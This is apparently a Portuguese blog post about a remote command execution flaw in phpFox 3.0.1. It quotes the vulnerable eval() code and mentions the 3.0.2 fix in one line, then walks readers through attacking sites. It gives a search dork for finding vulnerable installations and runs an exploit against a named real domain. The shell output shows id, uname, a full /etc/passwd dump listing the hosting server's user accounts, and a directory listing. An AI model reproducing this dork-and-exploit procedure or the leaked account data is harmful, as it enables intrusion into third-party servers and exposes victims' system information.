Foi descoberta no dia 7 de fevereiro de 2012 e liberada em público anteontem (23/03/2012) uma vulnerabilidade no software phpFox, uma rede social em PHP, muito utilizado.
A vulnerabilidade está presente na versão 3.0.1 ou anterior. Trata-se de Remote Command Execution.
Uma atualização foi liberada (versão 3.0.2), mas nem todo administrador tem saco pra ficar atualizando seus sistemas (essa é a verdade).
É daquelas falhas que há um exploit que já faz tudo pra você. Vou mostrar como utilizar o exploit, mas antes, vamos entender a falha, que está no arquivo /include/library/phpfox/module/module.class.php, acessado pelo arquivo /ajax.php, das linhas 716 até 754. Veja:
1
2
3
4
5
6
7
8
9
10
11
| 716. $aParts = explode('.', $sClass); 717. $sModule = $aParts[0]; 718. $sComponent = $sType . PHPFOX_DS . substr_replace(str_replace('.', PHPFOX_DS, $sClass), '', 0, strlen($sModule . PHPFOX_DS)); ... 748. if (preg_match('/(.*?)\((.*?)\)/', $sComponent, $aMatches) && !empty($aMatches[2])) 749. { 750. eval('$aParams = array_merge($aParams, array(' . $aMatches[2] . '));'); 751. 752. $sComponent = $aMatches[1]; 753. $sClass = $aMatches[1]; 754. } |
No eval, o programador declara uma variável ao resultado de uma função, array_merge(), mas não trata as variáveis já declaradas utilizadas dentro do eval().
Solução: Atualizar para o phpFox 3.0.2.
Fechando a função array_merge, é possível executar outros códigos. Este exploit permite que você execute códigos no terminal do sistema. Vamos utilizá-lo?
Primeiro, pegue-o aqui. Baixe o arquivo ou copie e salve seu conteúdo.
Você precisa ter instalado o PHP.
Para encontrar websites vulneráveis, utilize a dork:
1
| intext:"Powered by phpFox Version 3.0.1" |
Então, no bash/DOS digite (suponhando que o exploit está salvo como ‘phpfox.php’):
1
| php phpfox.php www.valestream.com / |
php phpfox.php => diz ao PHP para executar o arquivo phpfox.php
www.valestream.com => domínio
/ => local da instalação do phpFox
Como neste caso o sistema estava rodando na raiz, colocamos apenas uma barra. Se ele estivesse instalado no diretório “phpfox”, digitaríamos ‘/phpfox’.
Veja o resultado:
1
2
3
4
5
6
7
| nonono@debian:/nonono$ php phpfox.php www.valestream.com /+----------------------------------------------------------+| phpFox <= 3.0.1 Remote Command Execution Exploit by EgiX |+----------------------------------------------------------+phofox-shell# |
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
| phofox-shell# iduid=1041(t2ypafw4) gid=1033(t2ypafw4) groups=1033(t2ypafw4)phofox-shell# uname -aLinux server6.hostinro.com 2.6.18-164.9.1.el5 #1 SMP Tue Dec 15 20:57:57 EST 2009 x86_64 x86_64 x86_64 GNU/Linuxphofox-shell# cat /etc/passwdroot:x:0:0:root:/root:/bin/bashbin:x:1:1:bin:/bin:/sbin/nologindaemon:x:2:2:daemon:/sbin:/sbin/nologinadm:x:3:4:adm:/var/adm:/sbin/nologinlp:x:4:7:lp:/var/spool/lpd:/sbin/nologinsync:x:5:0:sync:/sbin:/bin/syncshutdown:x:6:0:shutdown:/sbin:/sbin/shutdownhalt:x:7:0:halt:/sbin:/sbin/haltmail:x:8:12:mail:/var/spool/mail:/sbin/nologinnews:x:9:13:news:/etc/news:uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologinoperator:x:11:0:operator:/root:/sbin/nologingames:x:12:100:games:/usr/games:/sbin/nologingopher:x:13:30:gopher:/var/gopher:/sbin/nologinftp:x:14:50:FTP User:/var/ftp:/sbin/nologinnobody:x:99:99:Nobody:/:/sbin/nologinnscd:x:28:28:NSCD Daemon:/:/sbin/nologinvcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologinpcap:x:77:77::/var/arpwatch:/sbin/nologinrpc:x:32:32:Portmapper RPC user:/:/sbin/nologinmailnull:x:47:47::/var/spool/mqueue:/sbin/nologinsmmsp:x:51:51::/var/spool/mqueue:/sbin/nologinrpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologinnfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologinsshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologindbus:x:81:81:System message bus:/:/sbin/nologinavahi:x:70:70:Avahi daemon:/:/sbin/nologinhaldaemon:x:68:68:HAL daemon:/:/sbin/nologinavahi-autoipd:x:100:101:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologinapache:x:48:48:Apache:/var/www:/sbin/nologincpanel:x:32001:32001::/usr/local/cpanel:/bin/falsenamed:x:25:25:Named:/var/named:/sbin/nologinxfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologinmysql:x:101:103:MySQL server:/var/lib/mysql:/bin/bashmailman:x:32002:32002::/usr/local/cpanel/3rdparty/mailman:/bin/falsecpanelhorde:x:32003:32005::/var/cpanel/userhomes/cpanelhorde:/usr/local/cpanel/bin/noshellcpanelphpmyadmin:x:32004:32006::/var/cpanel/userhomes/cpanelphpmyadmin:/usr/local/cpanel/bin/noshellcpanelphppgadmin:x:32005:32007::/var/cpanel/userhomes/cpanelphppgadmin:/usr/local/cpanel/bin/noshellcpanelroundcube:x:32006:32008::/var/cpanel/userhomes/cpanelroundcube:/usr/local/cpanel/bin/noshellhostinro:x:504:501::/home/hostinro:/usr/local/cpanel/bin/noshellrivonze:x:508:504::/home/rivonze:/usr/local/cpanel/bin/noshellgabi0001:x:509:505::/home/gabi0001:/usr/local/cpanel/bin/noshellanndreii:x:510:506::/home/anndreii:/usr/local/cpanel/bin/noshelltomcat:x:102:99::/home/tomcat:/bin/bashstefan1:x:514:510::/home/stefan1:/usr/local/cpanel/bin/noshelltrimitef:x:519:515::/home/trimitef:/usr/local/cpanel/bin/noshellavaos:x:520:516::/home/avaos:/usr/local/cpanel/bin/noshellcsl2ro:x:521:517::/home/csl2ro:/usr/local/cpanel/bin/noshellmosnicol:x:524:520::/home/mosnicol:/usr/local/cpanel/bin/noshellpariulzi:x:527:523::/home/pariulzi:/usr/local/cpanel/bin/noshellcameliab:x:529:525::/home/cameliab:/usr/local/cpanel/bin/noshellvaleabuz:x:530:526::/home/valeabuz:/usr/local/cpanel/bin/noshellrecomand:x:531:527::/home/recomand:/usr/local/cpanel/bin/noshelljordivil:x:1005:1000::/home/jordivil:/usr/local/cpanel/bin/noshellrecom:x:1006:1001::/home/recom:/usr/local/cpanel/bin/noshellpromovar:x:1007:1002::/home/promovar:/usr/local/cpanel/bin/noshellcautpeci:x:1008:1003::/home/cautpeci:/usr/local/cpanel/bin/noshelliaudepen:x:1010:1005::/home/iaudepen:/usr/local/cpanel/bin/noshellcpaneleximfilter:x:1009:503::/var/cpanel/userhomes/cpaneleximfilter:/usr/local/cpanel/bin/noshellartnudep:x:1011:1006::/home/artnudep:/usr/local/cpanel/bin/noshellclamav:x:103:104:Clam Anti Virus Checker:/var/clamav:/sbin/nologindriveren:x:1016:1010::/home/driveren:/usr/local/cpanel/bin/noshellservicel:x:1017:1011::/home/servicel:/usr/local/cpanel/bin/noshellkameniro:x:1018:1012::/home/kameniro:/usr/local/cpanel/bin/noshelllumio:x:1019:1013::/home/lumio:/usr/local/cpanel/bin/noshellstefan:x:1021:1015::/home/stefan:/usr/local/cpanel/bin/noshelleventtra:x:1022:1016::/home/eventtra:/bin/bashfilmeb:x:1024:1017::/home/filmeb:/usr/local/cpanel/bin/noshellhostings:x:1026:1019::/home/hostings:/usr/local/cpanel/bin/noshellraduz:x:1028:1021::/home/raduz:/usr/local/cpanel/bin/noshelldovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologintpech6fr:x:1029:1022::/home/tpech6fr:/usr/local/cpanel/bin/noshellbr2m8cle:x:1030:1023::/home/br2m8cle:/usr/local/cpanel/bin/noshellstefan4:x:1035:1027::/home/stefan4:/usr/local/cpanel/bin/noshellv9traj6t:x:1036:1028::/home/v9traj6t:/usr/local/cpanel/bin/noshellprocasim:x:1037:1029::/home/procasim:/bin/falseukick:x:1038:1030::/home/ukick:/usr/local/cpanel/bin/noshellmabis:x:1040:1032::/home/mabis:/usr/local/cpanel/bin/noshellt2ypafw4:x:1041:1033::/home/t2ypafw4:/usr/local/cpanel/bin/noshellsmedia:x:1042:1034::/home/smedia:/usr/local/cpanel/bin/noshellp6v9tp6t:x:1044:1036::/home/p6v9tp6t:/usr/local/cpanel/bin/noshellpr3wr9tp:x:1045:1037::/home/pr3wr9tp:/usr/local/cpanel/bin/noshellwr4ph4n9:x:1046:1038::/home/wr4ph4n9:/usr/local/cpanel/bin/noshellropiese:x:1047:1039::/home/ropiese:/usr/local/cpanel/bin/noshelldeboala:x:1048:1040::/home/deboala:/usr/local/cpanel/bin/noshelladmin:x:1049:1041::/home/admin:/usr/local/cpanel/bin/noshellp8tp6vut:x:1050:1042::/home/p8tp6vut:/usr/local/cpanel/bin/noshelldomeniul:x:1051:1043::/home/domeniul:/bin/falseoradesan:x:1052:1044::/home/oradesan:/usr/local/cpanel/bin/noshelltramvaiu:x:1053:1045::/home/tramvaiu:/usr/local/cpanel/bin/noshelldiseasei:x:1055:1047::/home/diseasei:/usr/local/cpanel/bin/noshellfr4yp7br:x:1056:1048::/home/fr4yp7br:/usr/local/cpanel/bin/noshellbodymark:x:1057:1049::/home/bodymark:/bin/falsephofox-shell# lsajax.phpcorecrossdomain.phpgzip.phpimageimage.phpindex.htmljscriptmp3nodb.htmlpaokarapppsssssstyle*style.phptmpupgrade.htmlphofox-shell# |
Divertido?
Brinquem direito!

0 comentários:
Postar um comentário